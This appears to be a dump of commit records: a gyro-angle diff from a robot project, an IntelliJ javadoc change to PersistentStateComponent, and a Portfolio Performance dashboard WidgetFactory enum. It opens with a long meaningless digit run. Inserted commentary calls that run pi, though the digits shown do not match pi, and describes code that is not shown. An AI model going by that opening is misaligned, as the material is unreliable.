119881834797753566369807426542527862551818417574672890977772793800081647060016145249192173217214772350141441973568548161361157352552133475741849468438523323907394143334547762416862518983569485562099219222184272550254256887671790494601653466804988627232791786085784383827967976681454100953883786360950680064225125205117392984896084128488626945604241965285022210661186306744278622039194945047123713786960956364371917287467764657573962413890865832645995813390478027590099465764078951269468398352595709825822620522489407726719478268482601476990902640136394437455305068203496252451749399651431429809190659250937221696461515709858387410597885959772975498930161753928468138268683868942774155991855925245953959431049972524680845987273644695848653836736222626099124608051243884390451244136549762780797715691435997700129616089441694868555848406353422072225828488648158456028506016842739452267467678895252138522549954666727823986456596116354886230577456498035593634568174324112515076069479451096596094025228879710893145669136867228748940560101503308617928680920874760917824938589009714909675985261365549781893129784821682998948722658804857564014270477555132379641451523746234364542858444795265867821051141354735739523113427166102135969536231442952484937187110145765403590279934403742007310578539062198387447808478489683321445713868751943506430218453191048481005370614680674919278
191197939952061419663428754440643745123718192179998391015919561814675142691239748940907186494231961567945208095146550225231603881930142093762137855956638937787083039069792077346722182562599661501421503068038447734549202605414665925201497442850732518666002132434088190710486331734649651453905796268561005508106658796998163574736384052571459102897064140110971206280439039759515677157700420337869936007230558763176359421873125147120532928191826186125867321579198414848829164470609575270695722091756711672291098169091528017350671274858322287183520935396572512108357915136988209144421006751033467110314126711136990865851639831501970165151168517143765761835155650884909989859982387345528331635507647918535893226185489632132933089857064204675259070915481416549859461637180270981994309924488957571282890592323326097299712084433573265489382391193259746366730583604142813883032038249037589852437441702913276561809377344403070746921120191302033038019762110110044929321516084244485963766983895228684783123552658213144957685726243344189303968642624341077322697802807318915441101044682325271620105265227211166039666557309254711055785376346682065310989652691862056476931257058635662018558100729360659876486117910453348850346113657686753249441668039626579787718556084552965412665408530614344431858676975145661406800700237877659134401712749470420562230538994561314071127000407854733269939081454664645880797270826683063432858785698305235808933065757406795457163775254202114955761581400250126228594130216471550979259230990796547376125517656751357517829666454779174501129961489030463994713296210734043751895735961458901938971311179042978285647503203198691514028708085990480109412147221317947647772622414254854540332157185306142288137585043063321751829798662237172159160771669254748738986654949450114654062843366393790039769265672146385306736096571209180763832716641627488880078692560290228472104031721186082041900042296617119637792133757511495950156604963186294726547364252308177036751590673502350728354056704038674351362222477158915049530984448933309634087807693259939780541934144737744184263129860809988868741326047215695162396586457302163159819319516735381297416772947867242292465436680098067692823828068996400482435403701416314965897940924323789690706977942236250822168895738379862300159377647165122893578601588161755782973523344604281512627203734314653197777416031990665541876397929334419521541341899485444734567383162499341913181480927777103863877343177207545654532207770921201905166096280490926360197598828161332316663652861932668633606273567630354477628035045077723554710585954870279081435624014517180624643626794561275318134078330336254232783944975382437205835311477119926063813346776879695970309833913077109870408591337464144282277263465947047458784778720192771528073176790770715721344473060570073349243693113835049316312840425121925651798069411352801314701304781643788518529092854520116583934196562134914341595625865865570552690496520985803385072242648293972858478316305777756068887644624824685792603953527734803048029005876075825104747091643961362676044925627420420832085661190625454337213153595845068772460290161876679524061634252257719542916299193064553779914037340432875262888963995879475729174642635745525407909145135711136941091193932519107602082520261879853188770584297259167781314969900901921169717372784768472686084900337702424291651300500516832336435038951702989392233451722013812806965011784408745196012122859937162313017114448464090389064495444006198690754851602632750529834918740786680881833851022833450850486082503930213321971551843063545500766828294
930413776552793975175461395398468339363830474611996653858153842056853386218672523340283087112328278921250771262946322956398989893582116745627010218356462201349671518819097303811980049734072396103685406643193950979019069963955245300545058068550195673022921913933918568034490398205955100226353536192041994745538593810234395544959778377902374216172711172364343543947822181852862408514006660443325888569867054315470696574745855033232334210730154594051655379068662733379958511562578432298827372319898757141595781119635833005940873068121602876496286744604774649159950549737425626901049037781986835938146574126804925648798556145372347867330390468838343634655379498641927056387293174872332083760112302991136793862708943879936201629515413371424892830722012690147546684765357616477379467520049075715552781965362132392640616013635815590742202020318727760527721900556148425551879253034351398442532234157623361064250639049750086562710953591946589751413103482276930624743536325691607815478181152843667957061108615331504452127473924544945423682886061340841486377670096120715124914043027253860764823634143346235189757664521641376796903149501910857598442391986291642193994907236234646844117394032659184044378051333894525742399508296591228508555821572503107125701266830240292952522011872676756220415420516184163484756516999811614101002996078386909291603028840026910414079288621507842451670908700069928212066041837180653556725253256753286129104248776182582976515795984703562226293486003415872298053498965022629174878820273420922224533985626476691490556284250391275771028402799806636582548892648802545661017296702664076559042909945681506526530537182941270336931378517860904070866711496558343434769338578171138645587367812301458768712660348913909562009939361031029161615288138437909904231747336394804575931493140529763475748119356709110137751721008031559024853090669203767192203322909433467685142214477379393751703443661991040337511173547191855046449026365512816228824462575916333039107225383742182140883508657391771509682887478265699599574490661758344137522397096834080053559849175417381883999446974867626551658276584835884531427756879002909517028352971634456212964043523117600665101241200659755851276178583829204197484423608007193045761893234922927965019875187212726750798125547095890455635792122103334669749923563025494780249011419521238281530911407907386025152274299581807247162591668545133312394804947079119153267343028244186041426363954800044800267049624820179289647669758318327131425170296923488962766844032326092752496035799646925650493681836090032380929345958897069536534940603402166544375589004563288225054525564056448246515187547119621844396582533754388569094113031509526179378002974120766514793942590298969594699556576121865619673378623625612521632086286922210327488921865436480229678070576561514463204692790682120738837781423356282360896320806822246801224826117718589638140918390367367222088832151375560037279839400415297002878307667094447456013455641725437090697939612257142989467154357846878861444; //All the decimals <add> return deg; <add> } <ide> <ide> /* useful to have, just in case our robot gyro drifts */ <del> void resetGyroAngle() { <add> public void resetGyroAngle() { <ide> gy.reset(); <ide> } <ide>
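The "Added PI XD" commit above hard-codes thousands of digits in convertToRadian, overwrites the argument with 180/pi regardless of the input, and getFinalAngle refers to convertToRadian without calling it, so the class does not compile. A corrected sketch of the conversion, written standalone rather than tied to the robot's Gyro; Math.PI should be available even on the constrained CLDC-class VMs used by FRC at the time, and Math.toRadians does the same thing on a full JDK:

// Standalone sketch of a degrees-to-radians helper; in SensorInput the input would come from getGyroAngle().
public final class AngleConversion {

    static double convertToRadian(double deg) {
        // One multiplication and one division instead of a hand-typed constant.
        return deg * Math.PI / 180.0;   // Math.toRadians(deg) is equivalent on a full JDK
    }

    public static void main(String[] args) {
        System.out.println(convertToRadian(90.0));   // 1.5707963267948966, i.e. pi/2
    }
}

In the robot class itself, getFinalAngle would then simply return convertToRadian(getGyroAngle()) instead of discarding the result.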
Java
apache-2.0
c5ed4e26590285ca9b99ad55feb6afd6caa89530
0
semonte/intellij-community,xfournet/intellij-community,da1z/intellij-community,da1z/intellij-community,xfournet/intellij-community,semonte/intellij-community,xfournet/intellij-community,allotria/intellij-community,ThiagoGarciaAlves/intellij-community,ibinti/intellij-community,ibinti/intellij-community,idea4bsd/idea4bsd,signed/intellij-community,asedunov/intellij-community,allotria/intellij-community,da1z/intellij-community,asedunov/intellij-community,ibinti/intellij-community,suncycheng/intellij-community,asedunov/intellij-community,signed/intellij-community,idea4bsd/idea4bsd,allotria/intellij-community,ThiagoGarciaAlves/intellij-community,semonte/intellij-community,youdonghai/intellij-community,mglukhikh/intellij-community,allotria/intellij-community,semonte/intellij-community,asedunov/intellij-community,da1z/intellij-community,semonte/intellij-community,ibinti/intellij-community,mglukhikh/intellij-community,da1z/intellij-community,xfournet/intellij-community,ibinti/intellij-community,allotria/intellij-community,mglukhikh/intellij-community,apixandru/intellij-community,asedunov/intellij-community,ThiagoGarciaAlves/intellij-community,signed/intellij-community,FHannes/intellij-community,apixandru/intellij-community,asedunov/intellij-community,allotria/intellij-community,ibinti/intellij-community,idea4bsd/idea4bsd,xfournet/intellij-community,FHannes/intellij-community,ThiagoGarciaAlves/intellij-community,xfournet/intellij-community,ThiagoGarciaAlves/intellij-community,idea4bsd/idea4bsd,signed/intellij-community,semonte/intellij-community,allotria/intellij-community,vvv1559/intellij-community,mglukhikh/intellij-community,suncycheng/intellij-community,signed/intellij-community,FHannes/intellij-community,semonte/intellij-community,apixandru/intellij-community,vvv1559/intellij-community,youdonghai/intellij-community,ibinti/intellij-community,youdonghai/intellij-community,idea4bsd/idea4bsd,vvv1559/intellij-community,da1z/intellij-community,da1z/intellij-community,idea4bsd/idea4bsd,FHannes/intellij-community,semonte/intellij-community,semonte/intellij-community,idea4bsd/idea4bsd,ThiagoGarciaAlves/intellij-community,semonte/intellij-community,suncycheng/intellij-community,suncycheng/intellij-community,ThiagoGarciaAlves/intellij-community,youdonghai/intellij-community,signed/intellij-community,youdonghai/intellij-community,signed/intellij-community,apixandru/intellij-community,mglukhikh/intellij-community,vvv1559/intellij-community,apixandru/intellij-community,youdonghai/intellij-community,suncycheng/intellij-community,xfournet/intellij-community,vvv1559/intellij-community,mglukhikh/intellij-community,allotria/intellij-community,FHannes/intellij-community,youdonghai/intellij-community,FHannes/intellij-community,suncycheng/intellij-community,youdonghai/intellij-community,youdonghai/intellij-community,idea4bsd/idea4bsd,asedunov/intellij-community,idea4bsd/idea4bsd,signed/intellij-community,apixandru/intellij-community,xfournet/intellij-community,FHannes/intellij-community,ibinti/intellij-community,apixandru/intellij-community,vvv1559/intellij-community,ThiagoGarciaAlves/intellij-community,suncycheng/intellij-community,signed/intellij-community,idea4bsd/idea4bsd,youdonghai/intellij-community,allotria/intellij-community,mglukhikh/intellij-community,xfournet/intellij-community,asedunov/intellij-community,apixandru/intellij-community,idea4bsd/idea4bsd,da1z/intellij-community,ibinti/intellij-community,ThiagoGarciaAlves/intellij-community,signed/intellij-community,mglukhikh/intellij-community,suncycheng/inte
llij-community,ibinti/intellij-community,xfournet/intellij-community,ibinti/intellij-community,idea4bsd/idea4bsd,suncycheng/intellij-community,vvv1559/intellij-community,youdonghai/intellij-community,ibinti/intellij-community,ThiagoGarciaAlves/intellij-community,apixandru/intellij-community,mglukhikh/intellij-community,vvv1559/intellij-community,da1z/intellij-community,FHannes/intellij-community,vvv1559/intellij-community,ThiagoGarciaAlves/intellij-community,FHannes/intellij-community,suncycheng/intellij-community,FHannes/intellij-community,semonte/intellij-community,allotria/intellij-community,vvv1559/intellij-community,mglukhikh/intellij-community,asedunov/intellij-community,mglukhikh/intellij-community,youdonghai/intellij-community,apixandru/intellij-community,apixandru/intellij-community,youdonghai/intellij-community,asedunov/intellij-community,FHannes/intellij-community,vvv1559/intellij-community,allotria/intellij-community,mglukhikh/intellij-community,xfournet/intellij-community,vvv1559/intellij-community,asedunov/intellij-community,da1z/intellij-community,suncycheng/intellij-community,idea4bsd/idea4bsd,signed/intellij-community,FHannes/intellij-community,apixandru/intellij-community,apixandru/intellij-community,asedunov/intellij-community,ibinti/intellij-community,FHannes/intellij-community,apixandru/intellij-community,da1z/intellij-community,asedunov/intellij-community,signed/intellij-community,xfournet/intellij-community,ThiagoGarciaAlves/intellij-community,allotria/intellij-community,vvv1559/intellij-community,allotria/intellij-community,da1z/intellij-community,signed/intellij-community,semonte/intellij-community,suncycheng/intellij-community,xfournet/intellij-community,mglukhikh/intellij-community,da1z/intellij-community,semonte/intellij-community
/* * Copyright 2000-2015 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.openapi.components; import org.jetbrains.annotations.Nullable; /** * Every component which would like to persist its state across IDEA restarts * should implement this interface. * * See <a href="http://www.jetbrains.org/intellij/sdk/docs/basics/persisting_state_of_components.html">IntelliJ Platform SDK DevGuide</a> * for detailed description. * * In general, implementation should be thread-safe, because "loadState" is called from the same thread where component is initialized. * If component used only from one thread (e.g. EDT), thread-safe implementation is not required. */ public interface PersistentStateComponent<T> { /** * @return a component state. All properties, public and annotated fields are serialized. Only values, which differ * from default (i.e. the value of newly instantiated class) are serialized. <code>null</code> value indicates * that the returned state won't be stored, as a result previously stored state will be used. * @see com.intellij.util.xmlb.XmlSerializer */ @Nullable T getState(); /** * This method is called when new component state is loaded. The method can and will be called several times, if * config files were externally changed while IDEA running. * @param state loaded component state * @see com.intellij.util.xmlb.XmlSerializerUtil#copyBean(Object, Object) */ void loadState(T state); }
platform/core-api/src/com/intellij/openapi/components/PersistentStateComponent.java
/* * Copyright 2000-2015 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.openapi.components; import org.jetbrains.annotations.Nullable; /** * Every component which would like to persist its state across IDEA restarts * should implement this interface. * * See <a href="http://www.jetbrains.org/intellij/sdk/docs/basics/persisting_state_of_components.html">IntelliJ Platform SDK DevGuide</a> * for detailed description. * * In general, implementation should be thread-safe, because "loadState" is called from the same thread where component is initialized. * If component used only from one thread (e.g. EDT), thread-safe implementation is not required. */ public interface PersistentStateComponent<T> { /** * @return a component state. All properties, public and annotated fields are serialized. Only values, which differ * from default (i.e. the value of newly instantiated class) are serialized. <code>null</code> value indicates * that no state should be stored. * @see com.intellij.util.xmlb.XmlSerializer */ @Nullable T getState(); /** * This method is called when new component state is loaded. The method can and will be called several times, if * config files were externally changed while IDEA running. * @param state loaded component state * @see com.intellij.util.xmlb.XmlSerializerUtil#copyBean(Object, Object) */ void loadState(T state); }
cleanup javadoc for PersistentStateComponent.getState (context: IDEA-CR-6770)
platform/core-api/src/com/intellij/openapi/components/PersistentStateComponent.java
cleanup javadoc for PersistentStateComponent.getState (context: IDEA-CR-6770)
<ide><path>latform/core-api/src/com/intellij/openapi/components/PersistentStateComponent.java <ide> /** <ide> * @return a component state. All properties, public and annotated fields are serialized. Only values, which differ <ide> * from default (i.e. the value of newly instantiated class) are serialized. <code>null</code> value indicates <del> * that no state should be stored. <add> * that the returned state won't be stored, as a result previously stored state will be used. <ide> * @see com.intellij.util.xmlb.XmlSerializer <ide> */ <ide> @Nullable
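The record above is only a javadoc change, but the getState()/loadState() contract it documents is easiest to see in an implementation. A minimal sketch of a component using that contract; the class and field names are hypothetical, and registration of the component (normally done with the @State/@Storage annotations and plugin.xml) is omitted here:

import com.intellij.openapi.components.PersistentStateComponent;
import org.jetbrains.annotations.Nullable;

// Hypothetical settings component illustrating the PersistentStateComponent contract.
public class MySettingsComponent implements PersistentStateComponent<MySettingsComponent.SettingsState> {

    // Bean holding the persisted values; public fields are serialized, and only values that
    // differ from the defaults of a freshly instantiated bean are written out.
    public static class SettingsState {
        public boolean featureEnabled = false;
        public String lastUsedPath = "";
    }

    private SettingsState state = new SettingsState();

    @Nullable
    @Override
    public SettingsState getState() {
        // Returning null here means nothing is stored and the previously stored state is kept.
        return state;
    }

    @Override
    public void loadState(SettingsState loaded) {
        // May be called more than once if the config files are changed externally while the IDE runs.
        this.state = loaded;
    }
}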
Java
epl-1.0
c0520813115fb99265f5a609c657e1d9218138ea
0
buchen/portfolio,buchen/portfolio,sebasbaumh/portfolio,buchen/portfolio,sebasbaumh/portfolio,sebasbaumh/portfolio,buchen/portfolio,sebasbaumh/portfolio
package name.abuchen.portfolio.ui.views.dashboard; import java.text.MessageFormat; import java.time.ZoneId; import java.time.format.DateTimeFormatter; import java.time.format.FormatStyle; import java.util.OptionalDouble; import java.util.function.BiFunction; import java.util.stream.LongStream; import name.abuchen.portfolio.math.Risk.Drawdown; import name.abuchen.portfolio.math.Risk.Volatility; import name.abuchen.portfolio.model.Dashboard; import name.abuchen.portfolio.money.Money; import name.abuchen.portfolio.money.Values; import name.abuchen.portfolio.snapshot.PerformanceIndex; import name.abuchen.portfolio.ui.Messages; import name.abuchen.portfolio.ui.views.dashboard.heatmap.EarningsHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.InvestmentHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.PerformanceHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.YearlyPerformanceHeatmapWidget; import name.abuchen.portfolio.ui.views.dataseries.DataSeries; public enum WidgetFactory { HEADING(Messages.LabelHeading, Messages.LabelCommon, HeadingWidget::new), TOTAL_SUM(Messages.LabelTotalSum, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); int length = index.getTotals().length; return index.getTotals()[length - 1]; }) // .withBenchmarkDataSeries(false) // .build()), TTWROR(Messages.LabelTTWROR, Messages.ClientEditorLabelPerformance, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getFinalAccumulatedPercentage(); }).build()), IRR(Messages.LabelIRR, Messages.ClientEditorLabelPerformance, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> data.calculate(ds, period).getPerformanceIRR()) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_CHANGE(Messages.LabelAbsoluteChange, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); int length = index.getTotals().length; return index.getTotals()[length - 1] - index.getTotals()[0]; }) // .withBenchmarkDataSeries(false) // .build()), DELTA(Messages.LabelDelta, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateDelta(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_DELTA(Messages.LabelAbsoluteDelta, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateAbsoluteDelta(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), INVESTED_CAPITAL(Messages.LabelInvestedCapital, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateInvestedCapital(); return d.length > 0 ? 
d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_INVESTED_CAPITAL(Messages.LabelAbsoluteInvestedCapital, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateAbsoluteInvestedCapital(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), MAXDRAWDOWN(Messages.LabelMaxDrawdown, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getDrawdown().getMaxDrawdown(); }) // .withTooltip((ds, period) -> { DateTimeFormatter formatter = DateTimeFormatter .ofLocalizedDate(FormatStyle.LONG) .withZone(ZoneId.systemDefault()); PerformanceIndex index = data.calculate(ds, period); Drawdown drawdown = index.getDrawdown(); return MessageFormat.format(Messages.TooltipMaxDrawdown, formatter.format( drawdown.getIntervalOfMaxDrawdown().getStart()), formatter.format(drawdown.getIntervalOfMaxDrawdown().getEnd())); }) // .withColoredValues(false) // .build()), MAXDRAWDOWNDURATION(Messages.LabelMaxDrawdownDuration, Messages.LabelRiskIndicators, MaxDrawdownDurationWidget::new), VOLATILITY(Messages.LabelVolatility, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getVolatility().getStandardDeviation(); }) // .withTooltip((ds, period) -> Messages.TooltipVolatility) // .withColoredValues(false) // .build()), SEMIVOLATILITY(Messages.LabelSemiVolatility, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getVolatility().getSemiDeviation(); }) // .withTooltip((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); Volatility vola = index.getVolatility(); return MessageFormat.format(Messages.TooltipSemiVolatility, Values.Percent5.format(vola.getExpectedSemiDeviation()), vola.getNormalizedSemiDeviationComparison(), Values.Percent5.format(vola.getStandardDeviation()), Values.Percent5.format(vola.getSemiDeviation())); }) // .withColoredValues(false) // .build()), CALCULATION(Messages.LabelPerformanceCalculation, Messages.ClientEditorLabelPerformance, PerformanceCalculationWidget::new), CHART(Messages.LabelPerformanceChart, Messages.ClientEditorLabelPerformance, (widget, data) -> new ChartWidget(widget, data, DataSeries.UseCase.PERFORMANCE)), ASSET_CHART(Messages.LabelAssetChart, Messages.LabelStatementOfAssets, (widget, data) -> new ChartWidget(widget, data, DataSeries.UseCase.STATEMENT_OF_ASSETS)), HEATMAP(Messages.LabelHeatmap, Messages.ClientEditorLabelPerformance, PerformanceHeatmapWidget::new), HEATMAP_YEARLY(Messages.LabelYearlyHeatmap, Messages.ClientEditorLabelPerformance, YearlyPerformanceHeatmapWidget::new), HEATMAP_EARNINGS(Messages.LabelHeatmapEarnings, Messages.LabelEarnings, EarningsHeatmapWidget::new), TRADES_BASIC_STATISTICS(Messages.LabelTradesBasicStatistics, Messages.LabelTrades, TradesWidget::new), TRADES_PROFIT_LOSS(Messages.LabelTradesProfitLoss, Messages.LabelTrades, TradesProfitLossWidget::new), TRADES_AVERAGE_HOLDING_PERIOD(Messages.LabelAverageHoldingPeriod, Messages.LabelTrades, 
TradesAverageHoldingPeriodWidget::new), TRADES_TURNOVER_RATIO(Messages.LabelTradesTurnoverRate, Messages.LabelTrades, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); OptionalDouble average = LongStream.of(index.getTotals()).average(); if (!average.isPresent() || average.getAsDouble() <= 0) return 0.0; long buy = LongStream.of(index.getBuys()).sum(); long sell = LongStream.of(index.getSells()).sum(); return Long.min(buy, sell) / average.getAsDouble(); }) // .withTooltip((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); String currency = data.getCurrencyConverter().getTermCurrency(); OptionalDouble average = LongStream.of(index.getTotals()).average(); long buy = LongStream.of(index.getBuys()).sum(); long sell = LongStream.of(index.getSells()).sum(); return MessageFormat.format(Messages.TooltipTurnoverRate, Values.Money.format(Money.of(currency, buy)), Values.Money.format(Money.of(currency, sell)), Values.Money.format(Money.of(currency, (long)average.orElse(0))), Values.Percent2.format(average.isPresent() && average.getAsDouble() > 0 ? Long.min(buy, sell) / average.getAsDouble() : 0)); }) // .withColoredValues(false) .build()), HEATMAP_INVESTMENTS(Messages.LabelHeatmapInvestments, Messages.LabelTrades, InvestmentHeatmapWidget::new), CURRENT_DATE(Messages.LabelCurrentDate, Messages.LabelCommon, CurrentDateWidget::new), EXCHANGE_RATE(Messages.LabelExchangeRate, Messages.LabelCommon, ExchangeRateWidget::new), ACTIVITY_CHART(Messages.LabelTradingActivityChart, Messages.LabelCommon, ActivityWidget::new), // typo is API now!! VERTICAL_SPACEER(Messages.LabelVerticalSpacer, Messages.LabelCommon, VerticalSpacerWidget::new); private String label; private String group; private BiFunction<Dashboard.Widget, DashboardData, WidgetDelegate<?>> createFunction; private WidgetFactory(String label, String group, BiFunction<Dashboard.Widget, DashboardData, WidgetDelegate<?>> createFunction) { this.label = label; this.group = group; this.createFunction = createFunction; } public String getLabel() { return label; } public String getGroup() { return group; } public WidgetDelegate<?> create(Dashboard.Widget widget, DashboardData data) { return this.createFunction.apply(widget, data); } }
name.abuchen.portfolio.ui/src/name/abuchen/portfolio/ui/views/dashboard/WidgetFactory.java
package name.abuchen.portfolio.ui.views.dashboard; import java.text.MessageFormat; import java.time.ZoneId; import java.time.format.DateTimeFormatter; import java.time.format.FormatStyle; import java.util.OptionalDouble; import java.util.function.BiFunction; import java.util.stream.LongStream; import name.abuchen.portfolio.math.Risk.Drawdown; import name.abuchen.portfolio.math.Risk.Volatility; import name.abuchen.portfolio.model.Dashboard; import name.abuchen.portfolio.money.Money; import name.abuchen.portfolio.money.Values; import name.abuchen.portfolio.snapshot.PerformanceIndex; import name.abuchen.portfolio.ui.Messages; import name.abuchen.portfolio.ui.views.dashboard.heatmap.EarningsHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.InvestmentHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.PerformanceHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.YearlyPerformanceHeatmapWidget; import name.abuchen.portfolio.ui.views.dataseries.DataSeries; public enum WidgetFactory { HEADING(Messages.LabelHeading, Messages.LabelCommon, HeadingWidget::new), TOTAL_SUM(Messages.LabelTotalSum, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); int length = index.getTotals().length; return index.getTotals()[length - 1]; }) // .withBenchmarkDataSeries(false) // .build()), TTWROR(Messages.LabelTTWROR, Messages.ClientEditorLabelPerformance, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getFinalAccumulatedPercentage(); }).build()), IRR(Messages.LabelIRR, Messages.ClientEditorLabelPerformance, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> data.calculate(ds, period).getPerformanceIRR()) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_CHANGE(Messages.LabelAbsoluteChange, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); int length = index.getTotals().length; return index.getTotals()[length - 1] - index.getTotals()[0]; }) // .withBenchmarkDataSeries(false) // .build()), DELTA(Messages.LabelDelta, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateDelta(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_DELTA(Messages.LabelAbsoluteDelta, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateAbsoluteDelta(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), INVESTED_CAPITAL(Messages.LabelInvestedCapital, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateInvestedCapital(); return d.length > 0 ? 
d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_INVESTED_CAPITAL(Messages.LabelAbsoluteInvestedCapital, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateAbsoluteInvestedCapital(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), MAXDRAWDOWN(Messages.LabelMaxDrawdown, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getDrawdown().getMaxDrawdown(); }) // .withTooltip((ds, period) -> { DateTimeFormatter formatter = DateTimeFormatter .ofLocalizedDate(FormatStyle.LONG) .withZone(ZoneId.systemDefault()); PerformanceIndex index = data.calculate(ds, period); Drawdown drawdown = index.getDrawdown(); return MessageFormat.format(Messages.TooltipMaxDrawdown, formatter.format( drawdown.getIntervalOfMaxDrawdown().getStart()), formatter.format(drawdown.getIntervalOfMaxDrawdown().getEnd())); }) // .withColoredValues(false) // .build()), MAXDRAWDOWNDURATION(Messages.LabelMaxDrawdownDuration, Messages.LabelRiskIndicators, MaxDrawdownDurationWidget::new), VOLATILITY(Messages.LabelVolatility, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getVolatility().getStandardDeviation(); }) // .withTooltip((ds, period) -> Messages.TooltipVolatility) // .withColoredValues(false) // .build()), SEMIVOLATILITY(Messages.LabelSemiVolatility, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getVolatility().getSemiDeviation(); }) // .withTooltip((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); Volatility vola = index.getVolatility(); return MessageFormat.format(Messages.TooltipSemiVolatility, Values.Percent5.format(vola.getExpectedSemiDeviation()), vola.getNormalizedSemiDeviationComparison(), Values.Percent5.format(vola.getStandardDeviation()), Values.Percent5.format(vola.getSemiDeviation())); }) // .withColoredValues(false) // .build()), CALCULATION(Messages.LabelPerformanceCalculation, Messages.ClientEditorLabelPerformance, PerformanceCalculationWidget::new), CHART(Messages.LabelPerformanceChart, Messages.ClientEditorLabelPerformance, (widget, data) -> new ChartWidget(widget, data, DataSeries.UseCase.PERFORMANCE)), 